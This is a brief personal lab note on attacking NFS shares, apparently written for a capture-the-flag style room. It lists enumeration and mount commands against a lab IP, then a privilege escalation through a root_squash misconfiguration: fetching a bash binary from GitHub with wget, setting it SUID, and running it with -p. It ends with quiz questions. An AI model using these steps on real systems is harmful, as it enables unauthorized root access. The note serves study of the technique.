# NFS ###### tags: `network` `service` Network file systems it allow a systems share the directory and file over the network. # Working  ## RPC (protocol) Remote Procedure Call  ## File Access Permission  # Enumerate Know target share folder ``` showmount --exports 10.10.65.202 ``` Mounting remote folder on our local systems ``` mount -t nfs 10.10.65.202:/home /home/meowhecker/cyberDefence/service/nfs/localMount -nolock ``` # Exploiting NFS we got the initial access by using ssh private key ``` cappucino@polonfs ``` Next step: we have to elevate our privilege -> root_squash is OFF (Misconfiguration) we could set the SUID to our shell (Upload a Bash shell) ``` wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash ``` ``` chmod +sx bash ``` execute ``` ./bash -p ``` -p Using user ID to open it --- # Related vulnerable machine https://hackmd.io/@meowhecker/r1qsslaoi Question What process allows an NFS client to interact with a remote directory as though it was a physical device? What does NFS use to represent files and directories on the server? What two pieces of user data does the NFS server take as parameters for controlling user permissions?